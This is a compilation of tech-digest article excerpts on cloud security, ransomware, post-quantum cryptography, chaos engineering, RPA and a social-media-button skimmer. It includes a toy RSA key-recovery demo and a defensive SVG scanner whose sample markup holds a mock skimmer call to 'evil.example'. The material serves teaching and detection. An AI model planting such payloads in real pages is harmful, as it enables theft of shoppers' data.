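def toy_rsa_keypair(p=61, q=53, e=17):
    n = p * q                      # public modulus
    phi = (p - 1) * (q - 1)        # Euler's totient -- must stay secret
    d = pow(e, -1, phi)            # private exponent (Python 3.8+)
    return (n, e), d

def factor(n):
    """Trial division: trivial for tiny n, infeasible for 2048-bit n."""
    f = 2
    while f * f <= n:
        if n % f == 0:
            return f, n // f
        f += 1
    raise ValueError("n is prime")

(n, e), d = toy_rsa_keypair()
ciphertext = pow(42, e, n)                 # encrypt the message 42

# An attacker who can factor n recovers the private key and the plaintext:
p, q = factor(n)
d_recovered = pow(e, -1, (p - 1) * (q - 1))
print(pow(ciphertext, d_recovered, n))     # 42
```

Shor's algorithm performs the `factor` step in polynomial time on a sufficiently large quantum computer, which is why the article's "store now, decrypt later" concern applies to RSA-protected data captured today.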


Cultivating product thinking in your engineering team

The most common trap you’ll encounter is what’s called the “feature factory.” This is a development model where engineers are simply handed a list of features to build, without context. They’re measured on velocity and output, not on the value their work creates. This can be comfortable for some – it’s a clear path with measurable metrics – but it’s also a surefire way to kill innovation and engagement. ... First and foremost, you need to provide context, and you need to do so early and often. Don’t just hand a Jira ticket to an engineer. Before a sprint starts, take the time to walk through the “what,” the “why,” and the “who.” Explain the market research that led to this feature request, share customer feedback that highlights the problem, and introduce them to the personas you’re building for. A quick 15-minute session at the start of a sprint can make a world of difference. You should also give engineers a seat at the table. Invite them to meetings where product managers are discussing strategy and customer feedback. They don’t just need to hear the final decision; they need to be a part of the conversation that leads to it. When an engineer hears a customer’s frustration firsthand, they gain a level of empathy that a written user story can never provide. They’ll also bring a unique perspective to the table, challenging assumptions and offering technical solutions you may not have considered.


Adapting to New Cloud Security Challenges

While the essence of Non-Human Identities and their secret management is acknowledged, many organizations still grapple with implementing these practices efficiently. Some stumble over an over-reliance on traditional security measures, failing to adopt newer, more effective strategies that incorporate NHI management. Others struggle with time and resource constraints, lacking the efficient automation mechanisms that are crucial for proficient NHI management. The disconnect between security and R&D teams often results in fractured efforts, leading to potential security gaps, breaches, and data leaks. ... As more organizations migrate to the cloud, and with the rise of machine identities and secret management, the future of cloud security has been redefined. It is no longer solely about protection from known threats but now involves proactive strategies to anticipate and mitigate potential future risks. This shift requires organizations to rethink their approach to cybersecurity, with a keen focus on NHIs and Secrets Security Management. It requires an integrated endeavor, involving CISOs, cybersecurity professionals, and R&D teams, along with the use of scalable and innovative platforms. Thought leaders in the data field continue to emphasize that robust NHI management is vital to the future of cybersecurity, driving the message home for businesses of all sizes and across all industries.


Why IT Modernization Occurs at the Intersection of People and Data

A mandate for IT modernization doesn’t always mean the team has the complete expertise necessary to complete that mandate. It may take some time to arm the team with the correct knowledge to support modernization. Let’s take data analytics, for example. Many modern data analytics solutions, armed with AI, now allow teams to deliver natural language prompts that can retrieve the data necessary to inform strategic modernization initiatives without having to write expert-level SQL. While this lessens the need for writing scripts, IT leaders must still ensure their teams have the right expertise to construct the correct prompts. This could mean training on correct terms for presenting data and/or manipulating data, along with knowing in what circumstances to access that data. Having a well-informed and educated team will be especially important after modernization efforts are underway. ... One of the most important steps to IT modernization is arming your IT teams with a complete picture of the current IT infrastructure. It’s equivalent to giving them a full map before embarking on their modernization journey. In many situations, an ideal starting point is to ensure that any documentation, ER diagrams, and architectural diagrams are collected into a single repository and reviewed. Then, the IT teams use an observability solution that integrates with every part of the enterprise infrastructure to show each team how every part of it works together. 


Cyber Resilience Must Become The Third Pillar Of Security Strategy

For years, enterprise security has been built around two main pillars: prevention and detection. Firewalls, endpoint protection, and intrusion detection systems all aim to stop attackers before they do damage. But as threats grow more sophisticated, it’s clear that this isn’t enough. ... The shift to cloud computing has created dangerous assumptions. Many organizations believe that moving workloads to AWS, Azure, or Google Cloud means the provider “takes care of security.” ... Effective resilience starts with rethinking backup as more than a compliance checkbox. Immutable, air-gapped copies prevent attackers from tampering with recovery points. Built-in threat detection can spot ransomware or other malicious activity before it spreads. But technology alone isn’t enough. Mariappan urges leaders to identify the “minimum viable business” — the essential applications, accounts, and configurations required to function after an incident. Recovery strategies should be built around restoring these first to reduce downtime and financial impact. She also stresses the importance of limiting the blast radius. In a cloud context, that might mean segmenting workloads, isolating credentials, or designing architectures that prevent a single compromised account from jeopardizing an entire environment.
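One concrete slice of the recovery-point advice can be sketched as digest verification against a manifest kept on separate, write-once storage. This is a minimal illustration of the tamper-detection idea, not any vendor's feature; all names below are hypothetical.

```python
import hashlib

def fingerprint(data: bytes) -> str:
    """SHA-256 digest of a recovery point."""
    return hashlib.sha256(data).hexdigest()

# At backup time: record a digest per recovery point and keep the manifest
# on separate, write-once storage (the "air gap" the article refers to).
backups = {
    "db-2026-02-09": b"...snapshot bytes...",
    "db-2026-02-08": b"...older snapshot...",
}
manifest = {name: fingerprint(blob) for name, blob in backups.items()}

def verify(name: str, blob: bytes) -> bool:
    """A recovery point whose digest no longer matches has been tampered with."""
    return manifest.get(name) == fingerprint(blob)

print(verify("db-2026-02-09", backups["db-2026-02-09"]))    # True
print(verify("db-2026-02-09", b"ENCRYPTED BY RANSOMWARE"))  # False
```

The design choice that matters is separation: if the manifest lives on the same writable storage as the backups, ransomware that reaches the backups can rewrite the digests too.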


Breaking Systems to Build Better Ones: How AI is Reshaping Chaos Engineering

While AI dominates technical discussions across industries, Andrus maintains a pragmatic perspective on its role in system reliability. “If Skynet comes about tomorrow, it’s going to fail in three days. So I’m not worried about the AI apocalypse, because AI isn’t going to be able to build and maintain and run reliable systems.” The fundamental challenge lies in the nature of distributed systems versus AI capabilities. “A lot of the LLMs and a lot of what we talk about in the AI world is really non deterministic, and when we’re talking about distributed systems, we care about it working correctly every time, not just most of the time.” However, Andrus sees valuable applications for AI in specific areas. AI excels at providing suggestions and guidance rather than making deterministic decisions. ... Despite its name, chaos engineering represents the opposite of chaotic approaches to system reliability. “Chaos engineering is a bit of a misnomer. You know, a lot of people think, Oh, we’re going to go cause chaos and see what happens, and it’s the opposite. We want to engineer the chaos out of our systems.” This systematic approach to understanding system behavior under stress provides the foundation for building more resilient infrastructure. As AI-generated code increases system complexity, the need for comprehensive reliability testing becomes even more critical. 
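The "engineer the chaos out" framing maps naturally onto a hypothesis-driven experiment: inject a controlled fault and check whether the resilience mechanism masks it. A minimal, self-contained sketch of that loop (all names are my own, not Gremlin's API):

```python
class FaultInjector:
    """Deterministically fail the first n calls to the wrapped function."""
    def __init__(self, fail_first: int):
        self.remaining = fail_first

    def __call__(self, fn):
        def inner(*args, **kwargs):
            if self.remaining > 0:
                self.remaining -= 1
                raise ConnectionError("injected fault")  # the controlled "chaos"
            return fn(*args, **kwargs)
        return inner

def with_retry(fn, attempts=3):
    """The resilience mechanism under test: retry transient failures."""
    for i in range(attempts):
        try:
            return fn()
        except ConnectionError:
            if i == attempts - 1:
                raise

# Hypothesis: a 3-attempt retry policy survives up to two transient faults.
charge = FaultInjector(2)(lambda: "payment processed")
print(with_retry(charge))          # payment processed

# Falsification check: three consecutive faults exhaust the policy.
flaky = FaultInjector(3)(lambda: "payment processed")
try:
    with_retry(flaky)
except ConnectionError:
    print("experiment exposed the gap")
```

The point is the discipline, not the decorator: state what the system should tolerate, inject exactly that failure, and treat any surprise as a finding.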

Daily Tech Digest - August 20, 2024

Humanoid robots are a bad idea

Humanoid robots that talk, perceive social and emotional cues, elicit empathy and trust, trigger psychological responses through eye contact, and trick us into the false belief that they have inner thoughts, intentions and even emotions create for humanity what I consider a real problem. Our response to humanoid robots is based on delusion. Machines — tools, really — are being deliberately designed to hack our human hardwiring and deceive us into treating them as something they’re not: people. In other words, the whole point of humanoid robots is to dupe the human mind, to mislead us into having the kind of connection with these machines formerly reserved exclusively for other human beings. Why are some robot makers so fixated on this outcome? Why isn’t the goal instead to create robots that are perfectly designed for their function, rather than perfectly designed to trick the human mind? Why isn’t there a movement to make sure robots do not elicit false emotions and beliefs? What’s the harm in preserving our intuition that a robot is just a machine, just a tool? Why try to route around that intuition with machines that trick our minds, co-opting or hijacking our human empathy?


11 Irritating Data Quality Issues

Organizations need to put data quality first and AI second. Without dignifying this sequence, leaders fall into fear of missing out (FOMO) in attempts to grasp AI-driven cures to either competitive or budget pressures, and they jump straight into AI adoption before conducting any sort of honest self-assessment as to the health and readiness of their data estate, according to Ricardo Madan, senior vice president at global technology, business and talent solutions provider TEKsystems. “This phenomenon is not unlike the cloud migration craze of about seven years ago, when we saw many organizations jumping straight to cloud-native services, after hasty lifts-and-shifts, all prior to assessing or refactoring any of the target workloads. This sequential dysfunction results in poor downstream app performance since architectural flaws in the legacy on-prem state are repeated in the cloud,” says Madan in an email interview. “Fast forward to today, AI is a great ‘truth serum’ informing us of the quality, maturity, and stability of a given organization’s existing data estate -- but instead of facing unflattering truths, invest in holistic AI data readiness first, before AI tools."


CISOs urged to prepare now for post-quantum cryptography

Post-quantum algorithms often require larger key sizes and more computational resources compared to classical cryptographic algorithms, a challenge for embedded systems in particular. During the transition period, systems will need to run both classical and post-quantum algorithms to maintain interoperability with legacy systems. Deirdre Connolly, cryptography standardization research engineer at SandboxAQ, explained: “New cryptography generally takes time to deploy and get right, so we want to have enough lead time before quantum threats are here to have protection in place.” Connolly added: “Particularly for encrypted communications and storage, that material can be collected now and stored for a future date when a sufficient quantum attack is feasible, known as a ‘Store Now, Decrypt Later’ attack: upgrading our systems with quantum-resistant key establishment protects our present-day data against upcoming quantum attackers.” Standards bodies, hardware and software manufacturers, and ultimately businesses across the globe will have to implement new cryptography across all aspects of their computing systems. Work is already under way, with vendors such as BT, Google, and Cloudflare among the early adopters.
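The dual-algorithm transition Connolly describes is commonly deployed as a hybrid key exchange: a classical shared secret and a post-quantum shared secret both feed one key derivation, so the session key stays safe as long as either scheme holds. Below is a rough sketch of only the combiner step, in an HKDF-extract-then-expand style; the fixed byte strings are placeholders standing in for real ECDH and ML-KEM outputs, and the labels are invented.

```python
import hashlib
import hmac

def combine(classical_secret: bytes, pq_secret: bytes, context: bytes) -> bytes:
    """Derive one session key from both shared secrets.

    An attacker must break BOTH key exchanges to recover the session key,
    which is the point of running hybrid during the migration period.
    """
    ikm = classical_secret + pq_secret                                # concatenate
    prk = hmac.new(b"hybrid-kex-demo", ikm, hashlib.sha256).digest()  # extract
    return hmac.new(prk, context + b"\x01", hashlib.sha256).digest()  # expand

# Placeholder secrets standing in for e.g. an ECDH output and an ML-KEM output.
ecdh_ss = b"\x11" * 32
mlkem_ss = b"\x22" * 32
key = combine(ecdh_ss, mlkem_ss, b"hybrid handshake demo")
print(len(key))  # 32-byte session key
```

Changing either input secret changes the derived key, which is the property a hybrid scheme relies on; production protocols use vetted combiner constructions rather than ad-hoc ones like this sketch.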


AI for application security: Balancing automation with human oversight

Security testing should be integrated throughout Application Delivery Pipelines, from design to deployment. Techniques such as automated vulnerability scanning, penetration testing, continuous monitoring, and many others are essential. By embedding compliance and risk assessment tasks into underlying change management processes, IT professionals can ensure that security testing is at the core of everything they do. Incorporating these strategies at the application component level ensures alignment with business needs to effectively prioritize results, identify attacks, and mitigate risks before they impact the network and infrastructure. ... To build a security-first mindset, organizations must embed security best practices into their culture and workflows. If new IT professionals coming into an organization are taught that security-first isn’t a buzzword, but instead the way the organization operates, it becomes company culture. Making security an integral part of the application delivery pipelines ensures that security policies and processes align with business goals. Education and communication are key—security teams must work closely with developers to ensure that security requirements are understood and valued. 


TSA biometrics program is evolving faster than critics’ perceptions

Privacy impact assessments (PIAs) are not only carried out for each new or changed process, but also published and enforced. The images of U.S. citizens captured by the TSA may be evaluated and used for testing, but they are deleted within 12 hours. Travelers have the choice of opting out of biometric identity verification, in which case they go through a manual ID check, just like decades ago. As happened previously with body scanners, TSA has adapted the signage it uses to notify the public about its use of biometrics. Airports where TSA uses biometrics now have signs that state in bold letters that participation is optional, explain how it works and include QR codes for additional information. The technology is also highly accurate, with tests showing 99.97% accurate verifications. In the cases which do not match, the traveler must then go through the same manual procedure used previously and also in cases where people opt out. TSA does not use biometrics to match people against mugshots from local police departments, for deportations or surveillance. In contrast, the proliferation of CCTV cameras observing people on their way to the airport and back home is not mentioned by Senator Merkley.


Blockchain: Redefining property transactions and ownership

Blockchain’s core strength lies in its ability to create a secure, immutable ledger of transactions. In the real estate context, this means that all details related to a property transaction — from the initial agreement to the final transfer of ownership — are recorded in a way that cannot be altered or tampered with. Blockchain technology empowers brokers to streamline transactions and enhance transparency, allowing them to focus on offering personalised insights and strategic advice. This shift enables brokers to provide a more efficient and cost-effective service while maintaining their advisory role in the real estate process. Another innovative application of blockchain in real estate is through smart contracts. These are digital contracts that automatically execute when certain conditions are met, ensuring that the terms of an agreement are fulfilled without the need for manual oversight. In real estate, smart contracts can be used to automate everything from title transfers to escrow arrangements. This automation not only speeds up the process but also reduces the chances of disputes, as all terms are clearly defined and executed by the technology itself. Beyond improving the efficiency of transactions, blockchain also has the potential to change how we think about property ownership. 
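The smart-contract escrow described above is, at heart, a small state machine: funds release automatically once every agreed condition is confirmed and the price is fully deposited. On-chain implementations are typically written in a language like Solidity; this Python model (all names invented) only illustrates the automatic-execution logic.

```python
class EscrowContract:
    """Toy model of a smart-contract escrow for a property sale.

    Funds release to the seller only once every agreed condition is
    confirmed AND the full price is deposited. On a blockchain this logic
    runs on-chain, so neither party can alter it after signing.
    """

    def __init__(self, price: int, conditions):
        self.price = price
        self.pending = set(conditions)   # e.g. title check, inspection
        self.deposited = 0
        self.state = "open"

    def _maybe_settle(self):
        # The "automatic execution": no manual oversight decides settlement.
        if self.state == "open" and not self.pending and self.deposited >= self.price:
            self.state = "settled"

    def deposit(self, amount: int):
        self.deposited += amount
        self._maybe_settle()

    def confirm(self, condition: str):
        self.pending.discard(condition)
        self._maybe_settle()

deal = EscrowContract(500_000, {"title_verified", "inspection_passed"})
deal.deposit(500_000)
deal.confirm("title_verified")
print(deal.state)                  # open -- inspection still pending
deal.confirm("inspection_passed")
print(deal.state)                  # settled
```

Because the release rule is code rather than a clause a party must remember to enforce, the dispute surface the article mentions shrinks to whether the conditions were confirmed, not whether the terms were followed.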


Agile Reinvented: A Look Into the Future

There’s no denying that agile is poised at a pivotal juncture, especially given the advent of AI. While no one knows how AI will influence agile in the long term, it is already shaping how agile teams are structured and how its members approach their work, including using AI tools to code or write user stories and jobs to be done. To remain relevant and impactful, agile must be responsive to the evolving needs of the workforce. Younger developers, in particular, seek more room for creativity. New approaches to agile team formation—including Team and Org Topologies or FaST, which relies on elements of dynamic reteaming instead of fixed team structures to tackle complex work—are emerging to create space for innovation. Since agile was built upon the values of putting people first and adapting to change, it can, and should, continue to empower teams to drive innovation within their organizations. This is the heart of modern agile: not blindly adhering to a set of rules but embracing and adapting its principles to your team’s unique circumstances. As agile continues to evolve, we can expect to see it applied in even more varied and innovative ways. For example, it already intersects with other methodologies like DevSecOps and Lean to form more comprehensive frameworks. 


Breaking Free from Ransomware: Securing Your CI/CD Against RaaS

By embracing a proactive DevSecOps mindset, we can repel RaaS attacks and safeguard our code. Here’s your toolkit: ... Don’t wait until deployment to tighten the screws. Integrate security throughout the software development life cycle (SDLC). Leverage software composition analysis (SCA) and software bill of materials (SBOM) creation, helping you scrutinize dependencies for vulnerabilities and maintain a transparent record of every software component in your pipeline. ... Your pipelines aren’t static entities; they are living ecosystems demanding constant vigilance. Leverage tools to implement continuous monitoring and logging of pipeline activity. Look for anomalies, suspicious behaviors and unauthorized access attempts. Think of it as having a cybersecurity hawk perpetually circling your pipelines, detecting threats before they take root. ... Minimize unnecessary access to your CI/CD environment. Enforce strict role-based access controls and least-privilege principles. Utilize access control tools to manage user roles and permissions tightly, ensuring only authorized users can interact with sensitive resources. Remember, the 2022 GitHub vulnerability exposed the dangers of lax access control in CI/CD environments.
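The SCA/SBOM step above amounts to keeping a machine-readable inventory of every component in a build. A minimal sketch using only Python's standard library (the `toy-sbom` label is made up; a real pipeline would emit CycloneDX or SPDX and cross-check each entry against a vulnerability database):

```python
import json
from importlib import metadata

def minimal_sbom() -> dict:
    """Inventory every installed distribution as a bill-of-materials entry.

    Only the inventory step is shown here; vulnerability matching and
    signing of the resulting document are separate pipeline stages.
    """
    names = {
        (dist.metadata["Name"], dist.version)
        for dist in metadata.distributions()
        if dist.metadata["Name"]          # skip distributions with broken metadata
    }
    return {
        "format": "toy-sbom",             # invented label, not a real standard
        "components": [{"name": n, "version": v} for n, v in sorted(names)],
    }

sbom = minimal_sbom()
print(json.dumps(sbom["components"][:3], indent=2))   # first few entries
```

Generating the inventory at build time, rather than reconstructing it after an incident, is what makes the "transparent record" useful when a dependency is later found to be compromised.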


Achieving cloudops excellence

Although there are no hard-and-fast rules regarding how much to spend on cloudops as a proportion of the cost of building or migrating applications, I have a few rules of thumb. Typically, enterprises should spend 30% to 40% of their total cloud computing budget on cloud operations and management. This covers monitoring, security, optimization, and ongoing management of cloud resources. ... Cloudops requires a new skill set. Continuous training and development programs that focus on operational best practices are vital. This transforms the IT workforce from traditional system administrators to cloud operations specialists who are adept at leveraging cloud environments’ nuances for efficiency. Beyond technical implementations, enterprise leaders must cultivate a culture that prioritizes operational readiness as much as innovation. The essential components are clear communication channels, cross-departmental collaboration, and well-defined roles. Organizational coherence enables firms to pivot and adapt swiftly to the changing tides of technology and market demands. It’s also crucial to measure success by deployment achievements and ongoing performance metrics. By setting clear operational KPIs from the outset, companies ensure that cloud environments are continuously aligned with business objectives. 


What high-performance IT teams look like today — and how to build one

“Today’s high-performing teams are hybrid, dynamic, and autonomous,” says Ross Meyercord, CEO of Propel Software. “CIOs need to create a clear vision and articulate and model the organization’s values to drive alignment and culture.” High-performance teams are self-organizing and want significant autonomy in prioritizing work, solving problems, and leveraging technology platforms. But most enterprises can’t operate like young startups with complete autonomy handed over to devops and data science teams. CIOs should articulate a technology vision that includes agile principles around self-organization and other non-negotiables around security, data governance, reporting, deployment readiness, and other compliance areas. ... High-performance teams are often involved in leading digital transformation initiatives where conflicts around priorities and solutions among team members and stakeholders can arise. These conflicts can turn into heated debates, and CIOs sometimes have to step in to help manage challenging people issues. “When a CIO observes misaligned goals or intra-IT conflict, they need to step in immediately to prevent organizational scar tissue from forming,” says Meyercord of Propel Software. 



Quote for the day:

"Don't necessarily avoid sharp edges. Occasionally they are necessary to leadership." -- Donald Rumsfeld

Daily Tech Digest - December 06, 2020

Ransomware Set for Evolution in Attack Capabilities in 2021

“The Maginot line of cybersecurity transformation failed as the first adopters were the e-crime groups and cybercrime cartels, and we just have to pay attention now as perimeter defenses have failed and continue to fail, and visibility and hardening have become an extreme challenge. Most attacks you see today are attacks from the inside out – digital insiders using trusted ecosystems to leverage ransomware attacks and espionage and crime campaigns.” Looking at ransomware in particular, the trio said they do not see this stopping or slowing down, “and we continue to predict that this is going to extend significantly,” Foss said. He claimed ransomware groups have brought more people into their operations and are making sure they are getting trusted people, with nation-state adversaries taking part as well. “We see this reaching out to additional operating systems; traditionally this has only impacted Windows primarily, but with MacOS having such a market reach in the professional ecosystem of most organizations, we predict it will be targeted as well,” Foss said. “Linux is one we have started to see more campaigns begin to target, and a lot are looking at defacing webpages in addition to taking over core components of ecosystems that these companies operate.”


Rethinking Robotic Process Automation (RPA)

You can't converse much with anyone these days about automation without talking RPA. It seems the little bots are getting everywhere. It's almost like an alien invasion! But always, the talk seems to be about creating and imposing bots on us. A bot for this and a bot for that; pretty soon you have dozens of little creatures (think of all the little gremlins in the film of the same name!) all nibbling away at pieces of your work. Helpful they may be, but at what cost? In the UK and USA, as we came out of the 2008 financial crisis, economists were left scratching their heads, wrestling with what they call the productivity puzzle. Historically, economic growth has always been closely tied to productivity, e.g., if output per worker does not grow, then the economy does not grow. In the UK, productivity was actually lower than before the crisis hit. So if productivity growth is required, it only stands to reason that tools to increase productivity are a useful thing to have. (I know I am oversimplifying, but I think it works for where we are going.) What if RPA, instead of being about Robotic Process Automation, became about Robotic Process Assistants? In this new world, we would each have just one robot on our desktop/laptop/machine, a little like Automator on a Mac.


Quantum Sensors Will Revolutionise The Tech Industry

Measurement devices that exploit quantum properties have been around for a while, such as atomic clocks, laser distance meters, and the magnetic resonance imaging used for medical diagnosis. What is new is that individual quantum systems, like atoms and photons, are increasingly used as measurement probes. The entanglement and manipulation of quantum states are used to improve sensitivity, even beyond the limit set by a conventional formulation of the quantum mechanical uncertainty principle. Many scientists believe that quantum will enjoy its first real commercial success in sensing. That’s because sensing can exploit the very characteristic that makes building a quantum computer so difficult: the extraordinary sensitivity of quantum states to the environment. Whether they respond to the gravitational pull of buried objects or pick up magnetic fields from the human brain, quantum sensors can detect a wide range of tiny signals across the world. Some physicists believe that gravity-measuring quantum sensors, in particular, will quickly become widespread, with a potential market of USD 1 billion a year.


Banking to groceries — Data Protection Authority has multi-sector role, but must be efficient

First, the Data Protection Authority should follow a risk-based approach that is implicitly present in the Bill. For example, in many places, the Bill requires the DPA to consider the risk of harm to consumers while framing regulations. Additionally, the Bill categorises data into personal data, sensitive personal data, and critical personal data to differentiate the varying levels of risks that emanate from the misuse of data. Finally, the Bill creates a differential level of regulation between ordinary firms that use data, significant data fiduciaries, and small entities. These point to the fact that risk-based regulation must be inherent to the DPA’s strategic approach. Within this overall framework, the DPA can prioritise its resources by focusing on processing sensitive and critical personal data, and by overseeing significant data fiduciaries. This will allow the DPA to first build capacity in areas that pose the greatest threat to consumers, rather than expending its limited resources to regulate all sectors of economic activity. The DPA can further sharpen its focus by having a low threshold for exempting small entities. This will allow the DPA to focus its regulatory capacity towards firms that pose a larger risk to consumers by collecting and processing large volumes of data.


Australia’s Global RegTech Hub Poised for Growth

Like most businesses, local RegTechs have experienced disruption during the COVID-19 pandemic. The biggest challenge has been an immediate reduction in revenue. A contributing factor is the slowing of export opportunities, following travel restrictions and the postponement of trade events. Nonetheless, Australian RegTechs remain positive about future growth and continue to seek growth capital to fund product development, talent acquisition and market expansion. The pandemic has accelerated a shift towards remote working and digital interactions, increasing the risk of fraud and financial crime, and focusing organisations on the importance of robust cybersecurity. At the same time, Federal and State Governments are recognising the potential of RegTech to efficiently and effectively solve regulatory and compliance challenges, and to become a signature export for Australia. This, combined with regulatory pressure for all regulated entities across a range of industries to adopt RegTech, will create a strong platform for the sector to excel. ... Collectively, these actions will help Australian RegTechs to scale, creating local jobs, and supporting the export of Australian solutions.


Novel Online Shopping Malware Hides in Social-Media Buttons

The imposter buttons look just like the legitimate social-sharing buttons found on untold numbers of websites, and are unlikely to trigger any concern from website visitors, according to Sansec. Perhaps more interestingly, the malware’s operators also took great pains to make the buttons’ code itself look as normal and harmless as possible, to avoid being flagged by security solutions. “While skimmers have added their malicious payload to benign files like images in the past, this is the first time that malicious code has been constructed as a perfectly valid image,” according to Sansec’s recent posting. “The malicious payload assumes the form of an html <svg> element, using the <path> element as a container for the payload. The payload itself is concealed utilizing syntax that strongly resembles correct use of the <svg> element.” To complete the illusion that the image is benign, the malicious payloads are named after legitimate companies. The researchers found at least six major names being used to lend the payloads legitimacy: facebook_full, google_full, instagram_full, pinterest_full, twitter_full, and youtube_full. The result of all of this is that security scanners can no longer find the malware simply by testing for valid syntax.
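Sansec's point about syntax testing can be made concrete. A naive scanner might whitelist the characters a genuine <path> "d" attribute may contain; that catches crude smuggling, but a payload written to resemble valid path syntax, as in this campaign, slips straight past such a check. A minimal sketch of that naive heuristic (the sample markup and the check are illustrative, not taken from Sansec's report):

```python
import re
import xml.etree.ElementTree as ET

# Characters legitimately found in an SVG <path> "d" attribute:
# path commands (M, L, H, V, C, S, Q, T, A, Z and lowercase forms),
# digits, signs, exponents, dots, commas, and whitespace.
VALID_PATH_CHARS = re.compile(r'^[MmLlHhVvCcSsQqTtAaZz0-9eE+\-.,\s]*$')

def suspicious_paths(svg_markup: str) -> list[str]:
    """Return the 'd' attributes that contain characters a genuine
    path could never hold -- a crude hint of a smuggled payload."""
    root = ET.fromstring(svg_markup)
    flagged = []
    for elem in root.iter():
        if elem.tag.endswith('path'):
            d = elem.get('d', '')
            if not VALID_PATH_CHARS.match(d):
                flagged.append(d)
    return flagged

# A hypothetical skimmer-style button: the second <path> smuggles
# script-like text instead of drawing commands, so the whitelist
# catches it. A payload crafted to look like valid path data, as in
# the campaign described above, would NOT be caught this way.
sample = """<svg xmlns="http://www.w3.org/2000/svg">
  <path d="M10 10 L20 20 Z"/>
  <path d="onload=fetch('//evil.example/c')"/>
</svg>"""

print(suspicious_paths(sample))  # flags the second path only
```

This is exactly why, per Sansec, scanners can no longer rely on syntax validity alone and must fall back on behavioral or reputational signals.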


Embedding Trust at the Core of Critical Infrastructure

Technology is no longer an extension of critical infrastructure; it sits at the core of it. The network stands between critical data, assets, and systems and the users and services that leverage or operate them. That position makes it uniquely able to add essential visibility and controls for resiliency, but it also makes it a well-placed, high-value target for attackers. Resiliency of the network infrastructure itself is therefore crucial, and it is only achieved by building in steps to verify integrity, with technical features embedded in hardware and software. Secure boot ensures a network device boots using only software that is trusted by the Original Equipment Manufacturer. Image signing allows a user to add a digital fingerprint to an image to verify that the software running on the network has not been modified. Runtime defenses protect against the injection of malicious code into running network software, making it very difficult for attackers to exploit known vulnerabilities in software and hardware configurations. Equally important, vendors must use a Secure Development Lifecycle to enhance security, reduce vulnerabilities, and promote consistent security policy across solutions. All of this might sound like geek mumbo-jumbo, but these are non-negotiables in today’s world.
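At its heart, image signing means comparing a computed fingerprint of the software image against one produced with the vendor's key before the image is allowed to run. A minimal sketch follows; for simplicity it uses a symmetric HMAC where real secure-boot chains use asymmetric signatures verified against a public key anchored in hardware, and all names and values are illustrative:

```python
import hashlib
import hmac

# Illustrative only: real devices verify with a vendor public key
# burned into hardware, not a shared secret like this one.
VENDOR_KEY = b"vendor-signing-key"

def sign_image(image: bytes) -> str:
    """Produce a digital fingerprint for a software image."""
    return hmac.new(VENDOR_KEY, image, hashlib.sha256).hexdigest()

def verify_image(image: bytes, fingerprint: str) -> bool:
    """Refuse any image whose fingerprint does not match."""
    expected = sign_image(image)
    return hmac.compare_digest(expected, fingerprint)

firmware = b"router-os-17.3"
sig = sign_image(firmware)
assert verify_image(firmware, sig)             # untampered image is accepted
assert not verify_image(firmware + b"!", sig)  # a single changed byte is rejected
```

The same compare-before-run pattern underlies secure boot: each stage verifies the fingerprint of the next before handing over control.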


Out on the edge: The new cloud battleground isn’t in the cloud at all

The big cloud providers are all pursuing similar paths to the edge, anchored by the on-premises versions of their cloud infrastructure that have started rolling out this year. AWS’ Outposts, which was built for use within customer data centers, is also the foundation for AWS Local Zones and AWS Wavelength, which are miniature versions of the cloud giant’s technology stack that live in small, local data centers and telecommunications carriers’ point-of-presence facilities. The company says the experience it gained building out its retail e-commerce business lends itself perfectly to edge computing. “We already have more IoT devices connected to the cloud than any other cloud provider by a large margin. We have to do that for ourselves,” said AWS’ Vass. Customers can employ such Amazon inventions as AWS Greengrass for IoT devices, AWS Snowball for storage and AWS RoboMaker for development of robotic devices using Lambda serverless functions “on a POP, in a Local Zone and in the cloud, manage it all centrally and do decentralized execution,” he said. Microsoft’s Azure cloud edge strategy uses a similar approach. Edge Zones, which the company rolled out early this year, are essentially scaled-down Azure data centers located within miles of a customer.


Is RPA the same as AI? What’s the Difference, and What Are the Use Cases?

RPA uses software robots to automate human actions in business processes that involve interaction with digital systems. These actions are usually simple and repetitive, which makes them prone to human error and can erode employees’ motivation and efficiency. Software robots, on the other hand, bring notable benefits: accuracy (by minimizing human error), reliability (by being always available and by reducing delays), traceability (by providing audit trails and logs), and productivity (by increasing processing speed). A few examples of use cases are automating orders, processing payroll, customer onboarding, and data validation. ... Artificial intelligence “combines the human capacities for learning, perception, and interaction [...] at a level of complexity [and automation] that ultimately supersedes our own abilities.” It is a spectrum of technologies (e.g., natural language processing, computer vision, predictive modeling, data clustering, and many more) that opens new use cases for businesses and reduces the entry cost for many existing business problems that still require too much human intervention. ... To tackle these use cases and leverage the benefits of AI in business, using a data science and machine learning platform is a best practice — it is the key to successfully scaling AI projects and to bringing a robust data methodology to all levels of the business.
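The distinction is easiest to see in code. An RPA-style robot for one of the use cases above, data validation, applies fixed, deterministic rules and never learns from data, which is precisely what separates it from the AI technologies listed afterward. A minimal sketch (field names and rules are illustrative):

```python
import re

# Fixed, hand-written rules: the "software robot" applies them the
# same way every time, with a full audit trail of what failed.
VALIDATION_RULES = {
    "email":  lambda v: re.fullmatch(r"[^@\s]+@[^@\s]+\.[^@\s]+", v) is not None,
    "amount": lambda v: v.replace(".", "", 1).isdigit() and float(v) > 0,
}

def validate_order(order: dict) -> list[str]:
    """Return the fields that fail validation (empty list = clean order)."""
    return [field for field, rule in VALIDATION_RULES.items()
            if not rule(str(order.get(field, "")))]

print(validate_order({"email": "a@b.com", "amount": "19.99"}))   # []
print(validate_order({"email": "not-an-email", "amount": "-5"})) # ['email', 'amount']
```

An AI system tackling the same task would instead learn what a valid or fraudulent order looks like from historical examples rather than from hand-written rules, which is why the two technologies complement rather than replace each other.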


When Is It Time to Retire Your Legacy System and Go Cloud?

When your tried-and-tested technology becomes unwieldy and hurts your bottom line, upgrading is critical to fit the business. Let's say you're a construction company that uses an obsolete legacy proof-of-delivery (PoD) system. The system requires three full-time customer service specialists to manage the application (e.g., find the right documents, send them over to customers, work with invoices, and so on). Because of the old-school technology, making a single change or adding a new feature is costly and time-consuming. At the same time, the risk of human error is high and can result in unhappy customers, overheads, and delayed payments. Furthermore, customers call you to request their PoD, and the number of monthly calls now exceeds 1,000 and requires a lot of manual labor. This is a telltale sign that your traditional processes aren't effective, which hurts your entire business. Creating a cloud-based, easy-to-use PoD portal would ensure maximum automation of all relevant processes, eliminate customer calls or reduce them to a minimum, and deliver significant time and cost savings along with increased efficiency.



Quote for the day:

"Anger and intolerance are the enemies of correct understanding." -- Mahatma Gandhi